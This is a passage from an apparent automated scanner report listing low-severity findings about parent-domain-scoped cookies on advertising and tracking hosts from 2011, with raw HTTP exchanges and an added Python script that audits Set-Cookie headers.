Set-Cookie: N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; expires=Wed, 29-Aug-12 01:06:13 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6; expires=Wed, 29-Aug-12 01:06:13 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 102
Content-Type: application/x-javascript
Content-Length: 102

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='1765ifu1akkc79';
var ANSL='99999|^';
ANRTXR();


13.75. http://tags.bluekai.com/site/2964

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2964

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2964?id=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://cti.w55c.net/ct/rubicon-cms2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99saNUAf9465B; bkou=KJye999999W=; bko=KJ0E8VBQYaGE8X4Y/9kk1EW99YDs9b6=; bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzZ6OKsu9xe3rHUE; bklc=4e62c9c2; bk=LSg6zMqbInUze1lp; bkc=KJhERtOQLv+kRBCp1LZwYzCV9I/ynkHIvOGdCQUOwXE/ynOKiGsC9LC7CwnUG4aObZaXvDWsCgNXE9yt8I1x4a8DFGxz9yG4oOdsdXqeycOECGACS9tY4XYHWRVdsRl4qTnvwbtY074LjWeCQI0eXEkO4odmyJODir94qWqkrpVQXAW6MnXS0BIXsjPFlRgvO2ZUYmDe9YSHuGL=; bkdc=sf

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:02:09 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e62ce11; expires=Tue, 06-Sep-2011 01:02:09 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=VaDKuLV5c/cze1lp; expires=Fri, 02-Mar-2012 01:02:09 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJ0qyLl9y1qO0YOTnLZwARsORx3xgtF/Q1vwRDcymqARswj1jt9yw/lQcths8qLNGwJOB/0FOLHt+HYIBJx4hGUve6UMQI0cXxsoJO+c; expires=Fri, 02-Mar-2012 01:02:09 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhMRjMYpzYQym9UAJTqPa3RqJCr7Zd3ZKL4RmGHajZUkN/RbZBoks4GJ7Qr0xX99Nx1IQ==; expires=Fri, 02-Mar-2012 01:02:09 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Mon, 05-Sep-2011 01:02:09 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
BK-Server: a094
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
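
An added example, not part of the XSS.CX report or of the scanner that produced it: a small Python audit that re-implements the parent-domain test against a raw HTTP response and adds the two follow-ups the issue text leaves to the reader, namely whether a flagged cookie looks like a session token (by name, or by being session-lifetime and HttpOnly) and whether the Set-Cookie header is in fact a deletion. The sample response is constructed, modelled on the careerbuilder.com response later in this section with values shortened; the name heuristic in SESSION_NAME_HINTS and the `pref` and `stale` cookies are assumptions for the demonstration.

```python
# Added example, not from the XSS.CX report: re-implements the parent-domain
# cookie check over a raw HTTP response and adds the two follow-ups the issue
# text leaves to the reader (session-token heuristic, and deletion detection).
from email.utils import parsedate_to_datetime
from urllib.parse import unquote

# Name fragments that usually mark a session/auth cookie (assumed heuristic).
SESSION_NAME_HINTS = ("sid", "sess", "token", "auth")


def header_lines(raw_response):
    """Header block of a raw HTTP response as a list of lines (CRLF or LF)."""
    return raw_response.replace("\r\n", "\n").split("\n\n", 1)[0].split("\n")


def parse_set_cookies(raw_response):
    """Yield (name, attrs) for every Set-Cookie header in the response."""
    for line in header_lines(raw_response):
        if not line.lower().startswith("set-cookie:"):
            continue
        parts = [p.strip() for p in line.split(":", 1)[1].split(";")]
        name, _, value = parts[0].partition("=")
        attrs = {"value": value, "domain": None, "path": "/", "expires": None,
                 "max_age": None, "httponly": False, "secure": False}
        for part in parts[1:]:
            key, _, val = part.partition("=")
            key = key.strip().lower()
            if key in ("httponly", "secure"):
                attrs[key] = True
            elif key == "domain":
                attrs["domain"] = val.strip().lower()
            elif key == "max-age":
                attrs["max_age"] = val.strip()
            elif key in ("expires", "path"):
                attrs[key] = val.strip().strip('"')
        yield unquote(name.strip()), attrs        # CB%5FSID -> CB_SID


def response_date(raw_response):
    """The response's own Date header; cookie expiry is judged against it."""
    for line in header_lines(raw_response):
        if line.lower().startswith("date:"):
            return parsedate_to_datetime(line.split(":", 1)[1].strip())
    return None


def is_parent_scoped(host, domain):
    """True when Domain names a proper parent of the issuing host, e.g.
    domain=.bluekai.com on a cookie set by tags.bluekai.com: every host under
    that parent then receives the cookie and can overwrite it."""
    if not domain:
        return False                              # host-only cookie
    parent = domain.lstrip(".")
    host = host.lower()
    return host != parent and host.endswith("." + parent)


def looks_like_session(name, attrs):
    """A telling name, or a session-lifetime cookie that is also HttpOnly."""
    if any(hint in name.lower() for hint in SESSION_NAME_HINTS):
        return True
    no_expiry = attrs["expires"] is None and attrs["max_age"] is None
    return no_expiry and attrs["httponly"]


def is_deletion(attrs, now):
    """Max-Age<=0, or Expires at or before the response Date, clears the cookie."""
    if attrs["max_age"] is not None:
        return attrs["max_age"].lstrip("-").isdigit() and int(attrs["max_age"]) <= 0
    if attrs["expires"] and now is not None:
        try:
            return parsedate_to_datetime(attrs["expires"]) <= now
        except (TypeError, ValueError):
            return False
    return False


def audit(host, raw_response):
    """Every cookie whose Domain is a parent of `host`, with the follow-up checks."""
    now = response_date(raw_response)
    return [{"name": name, "domain": attrs["domain"], "httponly": attrs["httponly"],
             "session_like": looks_like_session(name, attrs),
             "deletion": is_deletion(attrs, now)}
            for name, attrs in parse_set_cookies(raw_response)
            if is_parent_scoped(host, attrs["domain"])]


# Constructed sample modelled on the careerbuilder.com response in this section;
# values are shortened and the last two Set-Cookie lines are invented.
SAMPLE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Sun, 04 Sep 2011 01:25:16 GMT\r\n"
    "Set-Cookie: CB%5FSID=dbe0a97e; domain=.careerbuilder.com; path=/; HttpOnly\r\n"
    "Set-Cookie: BID=X18BA410; domain=.careerbuilder.com; "
    "expires=Tue, 04-Sep-2012 01:25:17 GMT; path=/; HttpOnly\r\n"
    "Set-Cookie: pref=en; path=/\r\n"
    "Set-Cookie: stale=gone; domain=.careerbuilder.com; "
    "expires=Thu, 09-Sep-2010 01:27:14 GMT; path=/\r\n"
    "\r\n<html></html>\r\n"
)

if __name__ == "__main__":
    for finding in audit("www.careerbuilder.com", SAMPLE):
        print(finding)
```

Run audit(host, raw) with the host the request was sent to and the response text pasted from the report. A finding with session_like set deserves a second look even where the scanner says no session token is present; one with deletion set is the server clearing a cookie and can be dropped from the review.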

13.76. http://tags.bluekai.com/site/38

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/38

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: bklc, bk, bkc and bkdc (domain=.bluekai.com). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/38 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99saNUAf9465B; bkou=KJye999999W=; bko=KJ0E8VBQYaGE8X4Y/9kk1EW99YDs9b6=; bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzZ6OKsu9xe3rHUE; bklc=4e62c9bc; bk=JhN45MqbInUze1lp; bkc=KJhERtOQLv+kRBCp1LZwWzCV9I/ynkHIvOGdCQUOwyxANALh1axQX5KCXDc3RUyoxxSsFUh1eeq7ThOXUkuICOyeYCIAcXqdhLw9zamsiuaGeRJdyJWHCqXjM52FQLGdgRnv5IhAxmsef/whmDaI7Xf9AauvTO2LHrVfBSe0xEu1Fhg/lfyjkVd5iLGctjz/8x19/mavCy==; bkdc=sf

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:43:46 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e62c9c2; expires=Tue, 06-Sep-2011 00:43:46 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=LSg6zMqbInUze1lp; expires=Fri, 02-Mar-2012 00:43:46 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJhERtOQLv+kRBCp1LZwYzCV9I/ynkHIvOGdCQUOwXE/ynOKiGsC9LC7CwnUG4aObZaXvDWsCgNXE9yt8I1x4a8DFGxz9yG4oOdsdXqeycOECGACS9tY4XYHWRVdsRl4qTnvwbtY074LjWeCQI0eXEkO4odmyJODir94qWqkrpVQXAW6MnXS0BIXsjPFlRgvO2ZUYmDe9YSHuGL=; expires=Fri, 02-Mar-2012 00:43:46 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Mon, 05-Sep-2011 00:43:46 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Mon, 05 Sep 2011 00:43:46 GMT
Cache-Control: max-age=86400, private
BK-Server: a094
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

13.77. http://tags.bluekai.com/site/4449

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/4449

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: bklc, bk, bkc, bko, bkw5 and bkdc (domain=.bluekai.com). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/4449 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99saNUAf9465B; bkou=KJye999999W=; bko=KJ0E8VBQYaGE8X4Y/9kk1EW99YDs9b6=; bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzZ6OKsu9xe3rHUE; bklc=4e62c9df; bk=aBD3cMqbInUze1lp; bkc=KJ0qyLl9y1qO0cedjJ/4/y1eyhxQU2Kx9RD4yTnQ3yshUu6eyhTQ7y7veIBY8RKiXDcbR4hexWwVupWyPWeB9dcUG4aObZaXvDWsCgNXE9yt8I1x4a8DFGxz9yG4oOdsdXqeycOECGACS9tY4XYHWRVdsRl4qTnvwbtY074LjWeCQI0eXEkO4odmyJODir94qWqkrpVQXAW6MnXS0BIXsjPFlRgvO2ZUYmDe9WY6PW9=; bkst=KJhMRjMYpzYQym9UAJTqPa3RqJCr7Zd3ZKL4RmGHajZUkN/RbZBoks4G5F2AACX9O76Byy==; bkdc=sf

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 00:44:50 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e62ca02; expires=Tue, 06-Sep-2011 00:44:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=myAUzYJX+9Fze1lp; expires=Fri, 02-Mar-2012 00:44:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJhnasHQmYdOh1O6vLZwARsO/Hc/UX3J0G2CRRepol9p1nOh1enzwT7QbhG0GwOObZaXBuYt3tPQt9wA16c8RP0Gda96wAQdMcX/S1CbvxSsY3C8/wTbBe8/wRyFOUEFUMTZOoFpzxQIn0o4xGTOCxdueIBdTtaQrY7ehOY6OLWdT1i/y+I1hrXlxKV4PAckmlR0GwOO2LcT7YYdEt5QuYoaX9XtGdn5ske8/OgsUylAq2b10g5rHKVefWrWXQs3akys; expires=Fri, 02-Mar-2012 00:44:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJpgaVaQRe3P814/zWTRhonkRt9/VCw7hX/QYVDh1x99gXz/vx==; expires=Fri, 02-Mar-2012 00:44:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzkAOpWymeaXRhOxOT7Bi9u8Q81no/SE0b6OHO8LjZOGYXvkF0xW3adMsT1mDJiPTD/G5F69ctTQdQ==; expires=Fri, 02-Mar-2012 00:44:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Mon, 05-Sep-2011 00:44:50 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Location: http://segments.adap.tv/data/?p=datalogix&type=gif&segment=1,32838,33729&add=true&rnd=11785756489
BK-Server: bbc9
Content-Length: 0
Content-Type: text/html


13.78. http://tags.bluekai.com/site/450

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/450

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: bklc, bk, bkc and bkdc (domain=.bluekai.com). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/450 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99saNUAf9465B; bkou=KJye999999W=; bko=KJ0E8VBQYaGE8X4Y/9kk1EW99YDs9b6=; bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzZ6OKsu9xe3rHUE; bk=Y0OrmpqbInUze1lp; bkc=KJ0EWZHQt1FchsOpwLbwARsOxxgW86UkuXQhGwOMVOeXqpy1ee5kZOiYNieTOhyjD4iq64M2J3MX603G415mOCxI0eTR78mnQVcw59Ssoa/Wdt9pv+I+9jDwGZcXNDeI8LtG4m+VPef/FAxGcyO2+pD+

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:42:32 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e62c978; expires=Tue, 06-Sep-2011 00:42:32 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=tdEhIeqbInUze1lp; expires=Fri, 02-Mar-2012 00:42:32 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJyfh1M9LabvQScijJ/4A1kyYWiLxIwcLYeTDG/1ecF8ZOCLpLzCIn0G49A8OCxIueI1dTtcQKsZeOBe6OGWdT9M/yod1h3dlyuP4NGakKdR0ReYO2AcTlB01EeLZzf9AauvTO2LHrVfBSe0xEu1Fhg/lfyjkVd5iLGctjz/8x19tyLdwx==; expires=Fri, 02-Mar-2012 00:42:32 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Mon, 05-Sep-2011 00:42:32 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Mon, 05 Sep 2011 00:42:32 GMT
Cache-Control: max-age=86400, private
BK-Server: a094
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

13.79. http://tags.bluekai.com/site/4592

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/4592

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: bklc (domain=.bluekai.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site/4592 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99saNUAf9465B; bkou=KJye999999W=; bko=KJ0E8VBQYaGE8X4Y/9kk1EW99YDs9b6=; bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzZ6OKsu9xe3rHUE; bklc=4e62c9df; bk=aBD3cMqbInUze1lp; bkc=KJ0qyLl9y1qO0cedjJ/4/y1eyhxQU2Kx9RD4yTnQ3yshUu6eyhTQ7y7veIBY8RKiXDcbR4hexWwVupWyPWeB9dcUG4aObZaXvDWsCgNXE9yt8I1x4a8DFGxz9yG4oOdsdXqeycOECGACS9tY4XYHWRVdsRl4qTnvwbtY074LjWeCQI0eXEkO4odmyJODir94qWqkrpVQXAW6MnXS0BIXsjPFlRgvO2ZUYmDe9WY6PW9=; bkst=KJhMRjMYpzYQym9UAJTqPa3RqJCr7Zd3ZKL4RmGHajZUkN/RbZBoks4G5F2AACX9O76Byy==; bkdc=sf

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:50 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e62ca02; expires=Tue, 06-Sep-2011 00:44:50 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Mon, 05 Sep 2011 00:44:50 GMT
Cache-Control: max-age=86400, private
BK-Server: f778
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

13.80. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /oz/feeds/invite-media-rtb/tokens/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: cd and lm (Domain=.rubiconproject.com). The dq and SERVERID cookies in the same response carry no Domain attribute and are therefore host-only, so they are not part of this finding. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/feeds/invite-media-rtb/tokens/ HTTP/1.1
Host: tap.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 01:24:33 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: http://pixel.rubiconproject.com/tap.php?v=5852&nid=2101&put=
Content-Length: 0
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Mon, 03-Sep-2012 01:24:33 GMT; Path=/
Set-Cookie: dq=2|2|0|0; Expires=Mon, 03-Sep-2012 01:24:33 GMT; Path=/
Set-Cookie: lm="4 Sep 2011 01:24:33 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close
Content-Type: text/plain; charset=UTF-8


13.81. http://tu.connect.wunderloop.net/TU/1/1/1/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tu.connect.wunderloop.net
Path:   /TU/1/1/1/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: wlid (domain=.wunderloop.net). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TU/1/1/1/ HTTP/1.1
Host: tu.connect.wunderloop.net
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:50 GMT
Server: Apache
P3P: policyref="http://connect.wunderloop.net/w3c/p3p.xml", CP="NOI PSAa PSDa OUR IND UNI CNT"
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 31 Oct 1989 14:06:29 GMT
Last-Modified: Thu, 31 Oct 1989 14:06:29 GMT
Set-Cookie: wlid=id%3Aa_6f76e8d5cf024e8471d7df3851e5a9fc%3A; expires=Wed, 29-Aug-2012 00:54:50 GMT; domain=.wunderloop.net; Path=/
X-Cnection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

13.82. http://tu.connect.wunderloop.net/TU2/1/1/1/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tu.connect.wunderloop.net
Path:   /TU2/1/1/1/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: wlid (domain=.wunderloop.net). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TU2/1/1/1/ HTTP/1.1
Host: tu.connect.wunderloop.net
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wlid=id%3Aa_6f76e8d5cf024e8471d7df3851e5a9fc%3A

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:43:57 GMT
Server: Apache
P3P: policyref="http://connect.wunderloop.net/w3c/p3p.xml", CP="NOI PSAa PSDa OUR IND UNI CNT"
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 31 Oct 1989 14:06:29 GMT
Last-Modified: Thu, 31 Oct 1989 14:06:29 GMT
Set-Cookie: wlid=id%3Aa_6f76e8d5cf024e8471d7df3851e5a9fc%3A; expires=Wed, 29-Aug-2012 00:43:57 GMT; domain=.wunderloop.net; Path=/
X-Cnection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

13.83. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usatoday1.112.2o7.net
Path:   /b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: s_vi_yx7Fmxxchmux7Cx7Ech (Domain=.2o7.net). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954 HTTP/1.1
Host: usatoday1.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 01:25:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_yx7Fmxxchmux7Cx7Ech=[CS]v4|0-0|4E62D373[CE]; Expires=Fri, 2 Sep 2016 01:25:07 GMT; Domain=.2o7.net; Path=/
Location: http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Sat, 03 Sep 2011 01:25:07 GMT
Last-Modified: Mon, 05 Sep 2011 01:25:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www618
Content-Length: 0
Content-Type: text/plain
Connection: close


13.84. http://www.bizographics.com/collect/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /collect/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: BizoID and BizoData (Domain=.bizographics.com). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /collect/?fmt=gif&url=reuters.com&pid=501 HTTP/1.1
Host: www.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Content-Language: en-US
Date: Sun, 04 Sep 2011 00:45:19 GMT
Location: http://img.bizographics.com/1x1.gif
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4; Domain=.bizographics.com; Expires=Sun, 04-Mar-2012 12:45:19 GMT; Path=/
Set-Cookie: BizoData=Pp1FHRK43ZwxEqHtFj4aisdQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KQ6is7u1bQQY8aj5XcunNcMDa7Re6IGD4lOeTENrYq3ZvAd6xyMUDLG6hh7sErqHyaoEyKUrunjtqgDfn74jNwcPJZXKAa9DdLgeLHSyEVCqewehdQ95muedOoesP2U0B4uSKJipWuwJodXwOG6Ckz6TNNGdaF6nEbrp2RisySjMfspDrisu7VtBBjxqPldy6c1wwH4DELwm2ipwNthjuRJX8ipa7TbwiiAhQOisLScEBcVisgQgNPyXdljTHnfyBp1sJ7Vvkc46t01cWfT12ipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6nc4wINO1L7830xNl7tETxisz59RGoQec9up8HFkflmyEwieie; Domain=.bizographics.com; Expires=Sun, 04-Mar-2012 12:45:19 GMT; Path=/
Content-Length: 0
Connection: keep-alive


13.85. http://www.careerbuilder.com/JobPoster/Products/PostJobsInfo.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /JobPoster/Products/PostJobsInfo.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: CB_SID (sent URL-encoded as CB%5FSID) and BID (domain=.careerbuilder.com). The scanner's heuristic reports that the cookies do not appear to contain session tokens, but CB_SID has no expiry, is marked HttpOnly and is named like a session identifier, so treat it as one until the contents prove otherwise. You should review the contents of the cookies to determine their function.

Request

GET /JobPoster/Products/PostJobsInfo.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 36509
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
